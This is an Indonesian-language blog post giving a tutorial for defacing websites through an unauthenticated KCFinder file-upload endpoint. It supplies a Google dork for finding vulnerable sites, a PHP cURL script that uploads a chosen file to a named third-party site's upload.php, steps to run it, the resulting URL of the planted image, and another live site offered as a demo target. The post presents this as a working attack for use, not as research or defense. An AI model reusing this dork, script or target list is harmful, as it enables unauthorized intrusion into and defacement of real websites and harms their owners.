Uncategories Deface Dengan KCFinder (Nitip gambar) :v

Deface Dengan KCFinder (Nitip gambar) :v

4:44 AM
cara deface degan KCFinder cukup mudah :D
install xampp dlu + curl, semuanya ada digugel :v

####################################
Dork :
  • inurl:plugins/kcfinder/
#####################################

#####################################
exploit :
  • KCFinder/upload.php
#####################################

simpan ini dengan extensi (.php) 
contoh: aplod1.php



$uploadfile="gambar.png";
$ch = curl_init("http://www.baron-design.com/gw-includes/plugins/KCFinder/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('orange_themes'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?> 

keterangan: gambar.png = gambar yag mau kita upload :D
http://www.baron-design.com/gw-includes/plugins/KCFinder/upload.php = target ente :v
simpan: 
  • aplod1.php
  • gambar.png
di xampp/php :v
setelah itu, buka CMD,
ex:  cd xampp\cd php\php aplod1.php
udh ketauan kan letak gambar kita dmn :v

pada site ini, gambar kita terletak di http://www.baron-design.com/gw-content/uploads/files/gambar.png :v
semoga bermanfaat :v 

site demo: http://ferrarimarketletter.com/fuel/modules/fuel/assets/js/editors/ckeditor/plugins/kcfinder/upload.php :v :v 

Next
« Prev Post
Previous
Next Post »
Subscribe to: Post Comments (Atom)